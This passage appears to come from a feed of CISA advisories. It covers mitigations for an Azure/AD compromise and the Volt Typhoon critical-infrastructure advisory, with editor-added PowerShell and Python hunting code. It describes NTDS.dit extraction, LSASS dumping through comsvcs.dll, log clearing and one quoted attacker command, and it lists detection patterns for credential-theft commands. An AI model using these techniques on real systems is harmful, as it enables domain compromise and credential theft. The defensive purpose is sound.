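2024-01-10T08:40:56Z client=10.8.0.23 base=DC=corp,DC=local scope=WholeSubtree filter=(&(&(sAMAccountType=805306368)(servicePrincipalName=*)(!(sAMAccountName=krbtgt))(!(userAccountControl&2)))(adminCount=1))
2024-01-10T09:15:02Z client=10.8.0.77 base=DC=corp,DC=local scope=WholeSubtree filter=(&(objectClass=computer)(servicePrincipalName=*))
"""

if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_LOG.splitlines()):
        print(alert)
```

Single-category hits (the servicePrincipalName lookup from 10.8.0.77) are deliberately left below the alert threshold: monitoring and backup software issues those routinely, and it is the combination of user, host, trust and privileged-SPN enumeration from one source in about a minute that matches the behaviour in Table 1.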
MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST), which apply to all critical infrastructure organizations and network defenders. The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Secure and Monitor Administrator Accounts

The threat actor gained access to the network via compromised administrator accounts that did not have MFA enabled. The compromised USER2 Global Domain Administrator account could have enabled the threat actor to move laterally from the on-premises environment to the Azure tenant. In response to the incident, the victim organization removed administrator privileges for USER2. Additionally, the victim organization disabled unnecessary administrator accounts and enabled MFA for all administrator accounts. To prevent similar compromises, CISA and MS-ISAC recommend the following:
• Review current administrator accounts to determine their necessity and only maintain administrator accounts that are essential for network management. This will reduce the attack surface and focus efforts on the security and monitoring of necessary accounts.
• Restrict the use of multiple administrator accounts for one user.
• Create separate administrator accounts for on-premises and Azure environments to segment access.
• Implement the principle of least privilege to decrease a threat actor's ability to access key network resources.
• Enable just-in-time and just-enough access for administrator accounts to elevate the minimum necessary privileges for a limited time to complete tasks.
• Use phishing-resistant multifactor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible (particularly for webmail and VPNs) for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins [M1032]. For additional guidance on secure MFA configurations, visit CISA's More than a Password webpage and read CISA's Implementing Phishing-Resistant MFA fact sheet.

Reduce Attack Surface

Unnecessary accounts, software, and services in the network create additional vectors for a threat actor to compromise. CISA and MS-ISAC recommend the following:
• Establish policy and procedure for the prompt removal of unnecessary accounts and groups from the enterprise, especially privileged accounts. Organizations should implement a robust and continuous user management process to ensure accounts of offboarded employees are removed and can no longer access the network.
• Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.
• Determine the need and functionality of assets that require public internet exposure [CPG 1.A].
• Follow a routine patching cycle for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation.
• Restrict personal devices from connecting to the network. Personal devices are not subject to the same group policies and security measures as domain-joined devices.

Evaluate Tenant Settings

By default, in Azure AD all users can register and manage all aspects of applications they create.
Users can also determine and approve what organizational data and services the application can access. These default settings can enable a threat actor to access sensitive information and move laterally in the network. In addition, users who create an Azure AD tenant automatically become the Global Administrator for that tenant. This could allow a threat actor to escalate privileges to execute malicious actions. CISA and MS-ISAC recommend evaluating current user permissions in the Azure tenant to restrict potentially harmful permissions, including:
• Restrict users' ability to register applications. By default, all users in Azure AD can register and manage the applications they create and approve the data and services the application can access. If this is exploited, a threat actor can access sensitive information and move laterally in the network.
• Restrict non-administrators from creating tenants. Any user who creates an Azure AD tenant automatically becomes the Global Administrator for that tenant. This creates an opportunity for a threat actor to escalate privileges to the highest privileged account.
• Restrict access to the Azure AD portal to administrators only. Users without administrative privileges cannot change settings; however, they can view user info, group info, device details, and user privileges. This would allow a threat actor to gather valuable information for malicious activities.

Create a Forensically Ready Organization
• Collect access- and security-focused logs (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and virtual private network) for use in both detection and incident response activities [CPG 2.T].
• Enable complete coverage of tools, including Endpoint Detection and Response (EDR), across the environment for thorough analysis of anomalous activity and remediation of potential vulnerabilities.
Assess Security Configuration of Azure Environment

CISA created the Secure Cloud and Business Applications (SCuBA) assessment tool to help Federal Civilian Executive Branch (FCEB) agencies verify that an M365 tenant configuration conforms to a minimal viable secure configuration baseline. Although the SCuBA assessment tool was developed for FCEB, other organizations can benefit from its output. CISA and MS-ISAC recommend the following:
• Use tools that identify attack paths. This will enable defenders to identify common attack paths used by threat actors and shut them down before they are exploited.
• Review the security recommendations list provided by Microsoft 365 Defender. Focus remediation on critical vulnerabilities on endpoints that are essential to mission execution and contain sensitive data.

Evaluate Conditional Access Policies

Conditional access policies require users who want to access a resource to complete an action. Conditional access policies also account for common signals, such as user or group memberships, IP location information, device, application, and risky sign-in behavior identified through integration with Azure AD Identity Protection. Review current conditional access policies to determine if changes are necessary.

Reset All Passwords and Establish Secure Password Policies

In response to the incident, the victim organization reset passwords for all users.
• Employ strong password management alongside other attribute-based information, such as device information, time of access, user history, and geolocation data.
• Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as user passwords expire [CPG 2.A],[CPG 2.B],[CPG 2.C].
• Store credentials in a secure manner, such as with a credential manager, vault, or other privileged account management solution [CPG 2.L].
• For products that come with default passwords, ask vendors how they plan to eliminate default passwords, as highlighted in CISA's Secure by Design Alert: How Manufacturers Can Protect Customers by Eliminating Default Passwords.

Mitigations for Vendors

CISA recommends that vendors incorporate secure by design principles and tactics into their practices, limiting the impact of threat actor techniques and strengthening the secure posture for their customers.
• Prioritize secure by default configurations, such as eliminating default passwords and providing high-quality audit logs to customers with no additional configuration, at no extra charge. Secure by default configurations should be prioritized to eliminate the need for customer implementation of hardening guidance.
• Immediately identify, mitigate, and update affected products that are not patched in accordance with CISA's Known Exploited Vulnerabilities (KEV) catalog.
• Implement multifactor authentication (MFA), ideally phishing-resistant MFA, as a default (rather than opt-in) feature for all products.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started:
1. Select an ATT&CK technique described in this advisory (see Tables 2-9).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies' performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.
CISA and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

MS-ISAC: Center for Internet Security (CIS) Cyber-Attack Defense: CIS Benchmarks + CDM + MITRE ATT&CK

REFERENCES

[1] CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments

DISCLAIMER

The information in this report is being provided "as is" for informational purposes only. CISA and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or MS-ISAC.

VERSION HISTORY

February 15, 2024: Initial version.

  • PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure
    by CISA (CISA Cybersecurity Advisories) on 1 February 2024 at 8:37 pm

    SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) assess that People's Republic of China (PRC) state-sponsored cyber actors are seeking to pre-position themselves on IT networks for disruptive or destructive cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict with the United States. CISA, NSA, FBI and the following partners are releasing this advisory to warn critical infrastructure organizations about this assessment, which is based on observations from the U.S. authoring agencies' incident response activities at critical infrastructure organizations compromised by the PRC state-sponsored cyber group known as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus):
• U.S. Department of Energy (DOE)
• U.S. Environmental Protection Agency (EPA)
• U.S. Transportation Security Administration (TSA)
• Australian Signals Directorate's (ASD's) Australian Cyber Security Centre (ACSC)
• Canadian Centre for Cyber Security (CCCS), a part of the Communications Security Establishment (CSE)
• United Kingdom National Cyber Security Centre (NCSC-UK)
• New Zealand National Cyber Security Centre (NCSC-NZ)

The U.S. authoring agencies have confirmed that Volt Typhoon has compromised the IT environments of multiple critical infrastructure organizations—primarily in Communications, Energy, Transportation Systems, and Water and Wastewater Systems Sectors—in the continental and non-continental United States and its territories, including Guam. Volt Typhoon's choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions. The U.S. 
authoring agencies are concerned about the potential for these actors to use their network access for disruptive effects in the event of potential geopolitical tensions and/or military conflicts. CCCS assesses that the direct threat to Canada's critical infrastructure from PRC state-sponsored actors is likely lower than that to U.S. infrastructure, but should U.S. infrastructure be disrupted, Canada would likely be affected as well, due to cross-border integration. ASD's ACSC and NCSC-NZ assess Australian and New Zealand critical infrastructure, respectively, could be vulnerable to similar activity from PRC state-sponsored actors. As the authoring agencies have previously highlighted, the use of living off the land (LOTL) techniques is a hallmark of Volt Typhoon actors' malicious cyber activity when targeting critical infrastructure. The group also relies on valid accounts and leverages strong operational security, which, combined, allow for long-term undiscovered persistence. In fact, the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years. Volt Typhoon actors conduct extensive pre-exploitation reconnaissance to learn about the target organization and its environment; tailor their tactics, techniques, and procedures (TTPs) to the victim's environment; and dedicate ongoing resources to maintaining persistence and understanding the target environment over time, even after initial compromise. The authoring agencies urge critical infrastructure organizations to apply the mitigations in this advisory and to hunt for similar malicious activity using the guidance provided herein, along with the recommendations found in the joint guide Identifying and Mitigating Living Off the Land Techniques. These mitigations are primarily intended for IT and OT administrators in critical infrastructure organizations. 
Following the mitigations for prevention of or in response to an incident will help disrupt Volt Typhoon’s accesses and reduce the threat to critical infrastructure entities. If activity is identified, the authoring agencies strongly recommend that critical infrastructure organizations apply the incident response recommendations in this advisory and report the incident to the relevant agency (see Contact Information section). For additional information, see joint advisory People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection and U.S. Department of Justice (DOJ) press release U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure. For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage. Download the PDF version of this report: AA24-038A PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure (PDF, 1.56 MB ) Read the accompanying Malware Analysis Report: MAR-10448362-1.v1 Volt Typhoon. For a downloadable copy of indicators of compromise (IOCs), see: MAR-10448362.c1.v2.CLEAR_stix2.json (JSON, 51.99 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See Appendix C: MITRE ATT&CK Tactics and Techniques section for tables of the Volt Typhoon cyber threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Overview of Activity In May 2023, the authoring agencies—working with industry partners—disclosed information about activity attributed to Volt Typhoon (see joint advisory People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection). 
Since then, CISA, NSA, and FBI have determined that this activity is part of a broader campaign in which Volt Typhoon actors have successfully infiltrated the networks of critical infrastructure organizations in the continental and non-continental United States and its territories, including Guam. The U.S. authoring agencies have primarily observed compromises linked to Volt Typhoon in Communications, Energy, Transportation Systems, and Water and Wastewater Systems sector organizations' IT networks. Some victims are smaller organizations with limited cybersecurity capabilities that provide critical services to larger organizations or key geographic locations. Volt Typhoon actors tailor their TTPs to the victim environment; however, the U.S. authoring agencies have observed the actors typically following the same pattern of behavior across identified intrusions. Their choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable the disruption of OT functions across multiple critical infrastructure sectors (see Figure 1).

Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization's network architecture and operational protocols. This reconnaissance includes identifying network topologies, security measures, typical user behaviors, and key network and IT staff. The intelligence gathered by Volt Typhoon actors is likely leveraged to enhance their operational security. For example, in some instances, Volt Typhoon actors may have abstained from using compromised credentials outside of normal working hours to avoid triggering security alerts on abnormal account activities.

Volt Typhoon typically gains initial access to the IT network by exploiting known or zero-day vulnerabilities in public-facing network appliances (e.g., routers, virtual private networks [VPNs], and firewalls) and then connects to the victim's network via VPN for follow-on activities. Volt Typhoon aims to obtain administrator credentials within the network, often by exploiting privilege escalation vulnerabilities in the operating system or network services. In some cases, Volt Typhoon has obtained credentials insecurely stored on a public-facing network appliance.

Volt Typhoon uses valid administrator credentials to move laterally to the domain controller (DC) and other devices via remote access services such as Remote Desktop Protocol (RDP).

Volt Typhoon conducts discovery in the victim's network, leveraging living off the land (LOTL) binaries for stealth. A key tactic includes using PowerShell to perform targeted queries on Windows event logs, focusing on specific users and periods. These queries facilitate the discreet extraction of security event logs into .dat files, allowing Volt Typhoon actors to gather critical information while minimizing detection. This strategy, blending in-depth pre-compromise reconnaissance with meticulous post-exploitation intelligence collection, underscores their sophisticated and strategic approach to cyber operations.

Volt Typhoon achieves full domain compromise by extracting the Active Directory database (NTDS.dit) from the DC. Volt Typhoon frequently employs the Volume Shadow Copy Service (VSS) using command-line utilities such as vssadmin to access NTDS.dit. The NTDS.dit file is a centralized repository that contains critical Active Directory data, including user accounts, passwords (in hashed form), and other sensitive data, which can be leveraged for further exploitation. This method entails the creation of a shadow copy—a point-in-time snapshot—of the volume hosting the NTDS.dit file. By leveraging this snapshot, Volt Typhoon actors bypass the file locking mechanisms of a live Windows environment, which prevent direct access to NTDS.dit while the domain controller is operational.

Volt Typhoon likely uses offline password cracking techniques to recover plaintext passwords from these hashes. This process involves extracting the hashes from the NTDS.dit file and then applying password cracking methods such as brute force attacks, dictionary attacks, or rainbow tables. Each successfully cracked password allows Volt Typhoon actors to obtain elevated access and further infiltrate and manipulate the network.

Volt Typhoon uses elevated credentials for strategic network infiltration and additional discovery, often focusing on gaining capabilities to access OT assets. Volt Typhoon actors have been observed testing access to domain-joined OT assets using default OT vendor credentials, and in certain instances, they have possessed the capability to access OT systems whose credentials were compromised via NTDS.dit theft. This access enables potential disruptions, such as manipulating heating, ventilation, and air conditioning (HVAC) systems in server rooms or disrupting critical energy and water controls, leading to significant infrastructure failures (in some cases, Volt Typhoon actors had the capability to access camera surveillance systems at critical infrastructure facilities). In one confirmed compromise, Volt Typhoon actors moved laterally to a control system and were positioned to move to a second control system.

Figure 1: Typical Volt Typhoon Activity

After successfully gaining access to legitimate accounts, Volt Typhoon actors exhibit minimal activity within the compromised environment (except discovery as noted above), suggesting their objective is to maintain persistence rather than immediate exploitation.
This assessment is supported by observed patterns where Volt Typhoon methodically re-targets the same organizations over extended periods, often spanning several years, to continuously validate and potentially enhance their unauthorized accesses. Evidence of their meticulous approach is seen in instances where they repeatedly exfiltrate domain credentials, ensuring access to current and valid accounts. For example, in one compromise, Volt Typhoon likely extracted NTDS.dit from three domain controllers in a four-year period. In another compromise, Volt Typhoon actors extracted NTDS.dit two times from a victim in a nine-month period.

Industry reporting—identifying that Volt Typhoon actors are silent on the network following credential dumping and perform discovery to learn about the environment, but do not exfiltrate data—is consistent with the U.S. authoring agencies' observations. This indicates their aim is to achieve and maintain persistence on the network. In one confirmed compromise, an industry partner observed Volt Typhoon actors dumping credentials at regular intervals.

In addition to leveraging stolen account credentials, the actors use LOTL techniques and avoid leaving malware artifacts on systems that would cause alerts. Their strong focus on stealth and operational security allows them to maintain long-term, undiscovered persistence. Further, Volt Typhoon's operational security is enhanced by targeted log deletion to conceal their actions within the compromised environment.

See the below sections for Volt Typhoon TTPs observed by the U.S. authoring agencies from multiple confirmed Volt Typhoon compromises.

Observed TTPs

Reconnaissance

Volt Typhoon actors conduct extensive pre-compromise reconnaissance [TA0043] to learn about the target organization [T1591], its network [T1590], and its staff [T1589]. This includes web searches [T1593]—including victim-owned sites [T1594]—for victim host [T1592], identity, and network information, especially for information on key network and IT administrators. According to industry reporting, Volt Typhoon actors use FOFA[1], Shodan, and Censys for querying or searching for exposed infrastructure. In some instances, the U.S. authoring agencies have observed Volt Typhoon actors targeting the personal emails of key network and IT staff [T1589.002] post compromise.

Resource Development

Historically, Volt Typhoon actors have used multi-hop proxies for command and control (C2) infrastructure [T1090.003]. The proxy is typically composed of virtual private servers (VPSs) [T1583.003] or small office/home office (SOHO) routers. Recently, Volt Typhoon actors used Cisco and NETGEAR end-of-life SOHO routers implanted with KV Botnet malware to support their operations [T1584.005]. (See the DOJ press release U.S. Government Disrupts Botnet People's Republic of China Used to Conceal Hacking of Critical Infrastructure for more information.)

Initial Access

To obtain initial access [TA0001], Volt Typhoon actors commonly exploit vulnerabilities in networking appliances such as those from Fortinet, Ivanti Connect Secure (formerly Pulse Secure), NETGEAR, Citrix, and Cisco [T1190]. They often use publicly available exploit code for known vulnerabilities [T1588.005] but are also adept at discovering and exploiting zero-day vulnerabilities [T1587.004]. In one confirmed compromise, Volt Typhoon actors likely obtained initial access by exploiting CVE-2022-42475 in an unpatched network perimeter FortiGate 300D firewall. There is evidence of a buffer overflow attack identified within the Secure Sockets Layer (SSL)-VPN crash logs.

Once initial access is achieved, Volt Typhoon actors typically shift to establishing persistent access [TA0003].
They often use VPN sessions to securely connect to victim environments [T1133], enabling discreet follow-on intrusion activities. This tactic not only provides a stable foothold in the network but also allows them to blend in with regular traffic, significantly reducing their chances of detection.

Execution

Volt Typhoon actors rarely use malware for post-compromise execution. Instead, once Volt Typhoon actors gain access to target environments, they use hands-on-keyboard activity via the command-line [T1059] and other native tools and processes on systems [T1218] (often referred to as "LOLBins"), known as LOTL, to maintain and expand access to the victim networks. According to industry reporting, some "commands appear to be exploratory or experimental, as the operators [i.e., malicious actors] adjust and repeat them multiple times."[2] For more details on LOTL activity, see the Credential Access and Discovery sections and Appendix A: Volt Typhoon LOTL Activity.

Similar to LOTL, Volt Typhoon actors also use legitimate but outdated versions of network admin tools. For example, in one confirmed compromise, actors downloaded [T1105] an outdated version of comsvcs.dll to the DC in a non-standard folder. comsvcs.dll is a legitimate Microsoft Dynamic Link Library (DLL) file normally found in the System32 folder. The actors called this DLL's MiniDump export with the process ID of the Local Security Authority Subsystem Service (LSASS) to dump the LSASS process memory [T1003.001] and obtain credentials (LSASS process memory holds credential material, including password hashes, for the users currently logged on to the operating system (OS)).

The actors also use legitimate non-native network admin and forensic tools. For example, Volt Typhoon actors have been observed using Magnet RAM Capture (MRC) version 1.20 on domain controllers. MRC is a free imaging tool that captures the physical memory of a computer, and Volt Typhoon actors likely used it to analyze in-memory data for sensitive information (such as credentials) and in-transit data not typically accessible on disk. Volt Typhoon actors have also been observed implanting Fast Reverse Proxy (FRP) for command and control.[3] (See the Command and Control section.)

Persistence

Volt Typhoon primarily relies on valid credentials for persistence [T1078].

Defense Evasion

Volt Typhoon has strong operational security. Their actors primarily use LOTL for defense evasion [TA0005], which allows them to camouflage their malicious activity with typical system and network behavior, potentially circumventing simplistic endpoint security capabilities. For more information, see the joint guide Identifying and Mitigating Living off the Land Techniques.

Volt Typhoon actors also obfuscate their malware. In one confirmed compromise, Volt Typhoon obfuscated FRP client files (BrightmetricAgent.exe and SMSvcService.exe) and the command-line port scanning utility ScanLine by packing the files with Ultimate Packer for Executables (UPX) [T1027.002]. FRP client applications support encryption, compression, and easy token authentication and work across multiple protocols—including transmission control protocol (TCP), user datagram protocol (UDP), hypertext transfer protocol (HTTP), and hypertext transfer protocol secure (HTTPS). The FRP client applications use the Kuai connection protocol (KCP) for error-checked and anonymous data stream delivery over UDP, with packet-level encryption support. See Appendix C and CISA Malware Analysis Report (MAR)-10448362-1.v1 for more information.

In addition to LOTL and obfuscation techniques, Volt Typhoon actors have been observed selectively clearing Windows Event Logs [T1070.001], system logs, and other technical artifacts to remove evidence [T1070.009] of their intrusion activity and masquerading file names [T1036.005].
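The comsvcs.dll staging described under Execution and the UPX-packed FRP clients described under Defense Evasion leave the same kind of host artifact: an executable or DLL sitting in a temporary or public directory that either duplicates a System32 binary or is packed. The following PowerShell hunt for both is an added example and is not part of the advisory or of any CISA tooling. It assumes an elevated session on the host being examined and the C:\Windows\Temp and C:\Users\Public staging directories named later in this advisory (override with -Paths). The UPX check reads the PE section table directly and looks for UPX0/UPX1 section names, so a packer that renames its sections will not be caught; the hash comparison separates a genuine binary in an odd location from a different (for example outdated) build carrying the same name.

```powershell
# Added example, not part of the advisory. Hunts temp/public directories for
# (1) executables/DLLs whose name also exists in System32 (the comsvcs.dll staging case) and
# (2) UPX-packed PE files (the packed FRP client / ScanLine case), by reading the PE section table.
# Assumptions: run elevated on the host; default staging paths (override with -Paths).

function Test-UpxPacked {
    # Returns $true if any PE section is named UPX0/UPX1/UPX2. Renamed sections are not caught.
    param([string]$Path)
    try { $bytes = [System.IO.File]::ReadAllBytes($Path) } catch { return $false }
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) { return $false }  # no "MZ" header
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)                                              # e_lfanew
    if ($peOffset -le 0 -or ($peOffset + 24) -gt $bytes.Length) { return $false }
    if ([BitConverter]::ToUInt32($bytes, $peOffset) -ne 0x00004550) { return $false }               # "PE\0\0"
    $numSections   = [BitConverter]::ToUInt16($bytes, $peOffset + 6)
    $optHeaderSize = [BitConverter]::ToUInt16($bytes, $peOffset + 20)
    $sectionTable  = $peOffset + 24 + $optHeaderSize
    for ($i = 0; $i -lt $numSections; $i++) {
        $off = $sectionTable + ($i * 40)                                                           # IMAGE_SECTION_HEADER = 40 bytes
        if (($off + 8) -gt $bytes.Length) { break }
        $name = [System.Text.Encoding]::ASCII.GetString($bytes, $off, 8).TrimEnd([char]0)
        if ($name -match '^UPX\d') { return $true }
    }
    return $false
}

function Find-StagedBinaries {
    param([string[]]$Paths = @("$env:SystemRoot\Temp", "$env:PUBLIC"))
    $system32 = Join-Path $env:SystemRoot 'System32'
    foreach ($path in $Paths) {
        if (-not (Test-Path $path)) { continue }
        Get-ChildItem -Path $path -Recurse -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -in '.exe', '.dll' } |
            ForEach-Object {
                $canonical  = Join-Path $system32 $_.Name
                $inSystem32 = Test-Path $canonical
                $packed     = Test-UpxPacked $_.FullName
                if (-not ($inSystem32 -or $packed)) { return }   # "return" in ForEach-Object skips this item
                $identical = $false
                if ($inSystem32) {
                    # Same hash = genuine binary in an odd place; different hash = another build (e.g. an outdated comsvcs.dll)
                    $identical = (Get-FileHash $_.FullName -Algorithm SHA256).Hash -eq (Get-FileHash $canonical -Algorithm SHA256).Hash
                }
                [pscustomobject]@{
                    Path           = $_.FullName
                    NameInSystem32 = $inSystem32
                    IdenticalCopy  = $identical
                    UpxPacked      = $packed
                    Signature      = (Get-AuthenticodeSignature $_.FullName).Status
                    Version        = $_.VersionInfo.FileVersion
                    LastWrite      = $_.LastWriteTime
                }
            }
    }
}

Find-StagedBinaries | Format-Table -AutoSize
```

A hit with NameInSystem32 true and IdenticalCopy false is the comsvcs.dll pattern from this section (a legitimate but different build in the wrong place); a hit with UpxPacked true and Signature NotSigned is the pattern of the packed FRP clients. Neither is proof on its own, so pivot to the file's creation time, the account that wrote it, and any RDP session (Table 1 events 21/22) active at that moment.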
Credential Access

Volt Typhoon actors first obtain credentials from public-facing appliances after gaining initial access by exploiting privilege escalation vulnerabilities [T1068] in the operating system or network services. In some cases, they have obtained credentials insecurely stored on the appliance [T1552]. In one instance, where Volt Typhoon likely exploited CVE-2022-42475 in an unpatched Fortinet device, Volt Typhoon actors compromised a domain admin account stored inappropriately on the device.

Volt Typhoon also consistently obtains valid credentials by extracting the Active Directory database file (NTDS.dit)—in some cases multiple times from the same victim over long periods [T1003.003]. NTDS.dit contains usernames, hashed passwords, and group memberships for all domain accounts, essentially allowing for full domain compromise if the hashes can be cracked offline. To obtain NTDS.dit, the U.S. authoring agencies have observed Volt Typhoon:

1. Move laterally [TA0008] to the domain controller via an interactive RDP session using a compromised account with domain administrator privileges [T1021.001];
2. Execute the Windows-native vssadmin [T1006] command to create a volume shadow copy;
3. Use Windows Management Instrumentation Console (WMIC) commands [T1047] to execute ntdsutil (a LOTL utility) to copy NTDS.dit and the SYSTEM registry hive from the volume shadow copy; and
4. Exfiltrate [TA0010] NTDS.dit and the SYSTEM registry hive to crack passwords offline [T1110.002].

(For more details, including specific commands used, see Appendix A: Volt Typhoon LOTL Activity.)

Note: A volume shadow copy contains a copy of all the files and folders that exist on the specified volume. Each volume shadow copy created on a DC includes its NTDS.dit and the SYSTEM registry hive, which holds the boot key needed to decrypt the password hashes stored in NTDS.dit.

Volt Typhoon actors have also been observed interacting with a PuTTY application by enumerating existing stored sessions [T1012]. Given this interaction and the exposure of cleartext-stored proxy passwords used in remote administration, Volt Typhoon actors potentially had access to PuTTY profiles that allow access to critical systems (see the Lateral Movement section).

According to industry reporting, Volt Typhoon actors attempted to dump credentials through LSASS (see Appendix B for commands used).[2] The U.S. authoring agencies have observed Volt Typhoon actors leveraging Mimikatz to harvest credentials, and industry partners have observed Volt Typhoon leveraging Impacket.[2] Mimikatz is a credential dumping tool. In one confirmed compromise, Volt Typhoon actors used a compromised administrator account to deploy Mimikatz, then connected to a server over RDP and ran it. Impacket is an open source Python toolkit for programmatically constructing and manipulating network protocols. It contains tools for Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks—as well as remote service execution.

Discovery

Volt Typhoon actors have been observed using commercial tools, LOTL utilities, and appliances already present on the system for system information [T1082], network service [T1046], group [T1069], and user [T1033] discovery. Volt Typhoon uses at least the following LOTL tools and commands for these discovery techniques: cmd, certutil, dnscmd, ldifde, makecab, net user/group/use, netsh, nltest, netstat, ntdsutil, ping, PowerShell, quser, reg query/reg save, systeminfo, tasklist, wevtutil, whoami, wmic, and xcopy.

Some observed specific examples of discovery include:

- Capturing successful logon events [T1654].
Specifically, in one incident, analysis of the PowerShell console history of a domain controller indicated that security event logs were directed to a file named user.dat, as evidenced by the executed command Get-EventLog security -instanceid 4624 -after [year-month-date] | fl * | Out-File 'C:\users\public\documents\user.dat'. This indicates the group's specific interest in capturing successful logon events (event ID 4624) to analyze user authentication patterns within the network. Additionally, file system analysis, specifically of the Master File Table (MFT), uncovered evidence of a separate file, systeminfo.dat, which was created in C:\Users\Public\Documents but subsequently deleted [T1070.004]. The presence of these activities suggests a methodical approach by Volt Typhoon actors in collecting and then possibly removing traces of sensitive log information from the compromised system.

- Executing tasklist /v to gather a detailed process listing [T1057], followed by executing taskkill /f /im rdpservice.exe (the function of this executable is not known).
- Executing net user and quser for user account information [T1087.001].
- Creating and accessing a file named rult3uil.log on a domain controller in C:\Windows\System32\. The rult3uil.log file contained user activities on a compromised system, showcasing a combination of window title information [T1010] and focus shifts, keypresses, and command executions across Google Chrome and Windows PowerShell, with corresponding timestamps.
- Employing ping with various IP addresses to check network connectivity [T1016.001] and net start to list running services [T1007].

See Appendix A for additional LOTL examples. In one confirmed compromise, Volt Typhoon actors attempted to use Advanced IP Scanner, which was on the network for admin use, to scan the network.
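The vssadmin/ntdsutil chain described under Credential Access and the Get-EventLog harvesting described above are visible in two places the actors do not always clean: the per-user PSReadLine console history files (which is how the user.dat command above was found) and Security event 4688 when command-line auditing is enabled. The following hunt is an added example, not part of the advisory or of Appendix A; the regular expressions are this editor's own choices based on the commands the advisory names, and it assumes the default profile layout under C:\Users and that process creation auditing with command-line logging is turned on.

```powershell
# Added example, not part of the advisory. Searches for the LOTL command patterns this advisory
# describes in (1) PSReadLine console history files and (2) Security 4688 process-creation events.
# Assumptions: default C:\Users profile layout; 4688 with "Include command line" auditing enabled.

$patterns = @(
    'vssadmin\s+create\s+shadow'            # shadow copy to reach a locked NTDS.dit
    'ntdsutil'                               # ntdsutil used to copy NTDS.dit + SYSTEM from the snapshot
    'wmic\s+process\s+call\s+create'         # remote execution through WMIC
    'Get-EventLog\s+security.*Out-File'      # logon-event harvesting to a .dat file
    'wevtutil\s+(cl|clear-log)\b'            # event log clearing
    'comsvcs\.dll.*MiniDump'                 # LSASS dump via comsvcs.dll
    'netsh\s+interface\s+portproxy\s+add'    # PortProxy relay for C2
    'reg\s+save\s+hklm\\(system|sam)'        # hive export alongside NTDS.dit
)
$lotlRegex = $patterns -join '|'

function Find-SuspiciousConsoleHistory {
    # PSReadLine history is per user and is not touched by clearing the Windows event logs.
    Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $profileUser = $file.FullName.Split('\')[2]      # C:\Users\<user>\... -> <user>
            Select-String -Path $file.FullName -Pattern $lotlRegex |
                ForEach-Object {
                    [pscustomobject]@{ Source = 'ConsoleHistory'; User = $profileUser; Time = $file.LastWriteTime; Line = $_.Line.Trim() }
                }
        }
}

function Find-SuspiciousProcessCreation {
    param([int]$LookbackDays = 90)
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-$LookbackDays) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Event data layout for 4688: [1] SubjectUserName, [5] NewProcessName, [8] CommandLine
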